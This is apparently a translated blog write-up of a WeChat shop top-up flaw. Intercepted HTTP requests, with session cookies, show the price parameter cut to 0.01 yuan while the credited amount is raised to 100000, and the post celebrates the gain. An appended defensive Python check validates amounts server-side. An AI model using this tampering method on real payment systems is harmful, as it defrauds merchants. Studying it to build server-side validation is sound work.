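First, go to the personal profile page.
Tap "Top up" to open the top-up page.
Then tap the top-up button and intercept the request, which looks like this: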

GET /WxpayAPI/weixinpay/js_api_calltmy.php?order_no=125876581523781&price=100&shop_id=1483&spmc=%D3%E0%B6%EE%B3%E4%D6%B5&markprice=100 HTTP/1.1
Host: wx.***.com
Cookie: PHPSESSID=a75ba6a56fe46584722754fdadbb7e61; name_id=a75ba6a56fe46584722754fdadbb7e61; PHPSESSID=a75ba6a56fe46584722754fdadbb7e61
Connection: close
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Mobile/14A403 MicroMessenger/6.3.25 NetType/WIFI Language/zh_CN
Referer: http://wx.***.com/ShopIndex.php/User/Indexnew/usable_money/shop_id/1483?&login_member_id=14345
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate

Modify the price and markprice parameters. The modified request is:

GET /WxpayAPI/weixinpay/js_api_calltmy.php?order_no=125876581523781&price=0.01&shop_id=1483&spmc=%D3%E0%B6%EE%B3%E4%D6%B5&markprice=100000 HTTP/1.1
Host: wx.***.com
Cookie: PHPSESSID=a75ba6a56fe46584722754fdadbb7e61; name_id=a75ba6a56fe46584722754fdadbb7e61; PHPSESSID=a75ba6a56fe46584722754fdadbb7e61
Connection: close
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Mobile/14A403 MicroMessenger/6.3.25 NetType/WIFI Language/zh_CN
Referer: http://wx.***.com/ShopIndex.php/User/Indexnew/usable_money/shop_id/1483?&login_member_id=14345
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate

Then forward the request. WeChat Pay opens and shows a payment of 0.01 yuan.
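After entering the payment password, the top-up succeeded.
Rich in minutes!
Update
I hear the developers have already fixed the vulnerability; they were quite prompt about it.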
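
An added example, not code from the original post or from the affected site: a server-side check for this class of flaw that takes both amounts from the stored order instead of from the request. It assumes `price` is the amount charged and `markprice` the amount credited; the order store, balance table and function names are hypothetical, and gateway signature verification is assumed to happen before `on_paid` is called.

```python
from decimal import Decimal, InvalidOperation

class PaymentError(Exception):
    pass

# Constructed sample data: amounts (in fen) are fixed server-side at order creation.
ORDERS = {"125876581523781": {"member_id": 14345, "pay_fen": 10000,
                              "credit_fen": 10000, "status": "pending"}}
BALANCES = {14345: 0}

def to_fen(yuan):
    """Parse a yuan string into integer fen; reject anything non-numeric."""
    try:
        return int(Decimal(yuan) * 100)
    except (InvalidOperation, TypeError, ValueError, OverflowError):
        raise PaymentError("malformed amount")

def amount_to_charge(member_id, params):
    """Return the fen amount to send to the payment gateway for this request."""
    order = ORDERS.get(params.get("order_no"))
    if order is None or order["member_id"] != member_id:
        raise PaymentError("unknown order")
    if order["status"] != "pending":
        raise PaymentError("order not payable")
    # Client copies of the amounts are only compared, never used; a mismatch
    # is a tampering signal worth logging and alerting on.
    for field, stored in (("price", "pay_fen"), ("markprice", "credit_fen")):
        if field in params and to_fen(params[field]) != order[stored]:
            raise PaymentError(f"{field} does not match order")
    return order["pay_fen"]

def on_paid(order_no, paid_fen):
    """Handle a gateway notification whose signature is already verified."""
    order = ORDERS.get(order_no)
    if order is None:
        raise PaymentError("unknown order")
    if order["status"] == "paid":
        return BALANCES[order["member_id"]]  # replayed notification: no double credit
    if paid_fen != order["pay_fen"]:
        raise PaymentError("paid amount does not match order")
    order["status"] = "paid"
    BALANCES[order["member_id"]] += order["credit_fen"]
    return BALANCES[order["member_id"]]
```
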
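Link to this article: https://www.92ez.com/?action=show&id=23392
!!! To reprint, first contact non3gov@gmail.com for permission and prominently credit the author and link to the original !!!
Note: technical articles are time-sensitive; first confirm that this one applies to your current system environment.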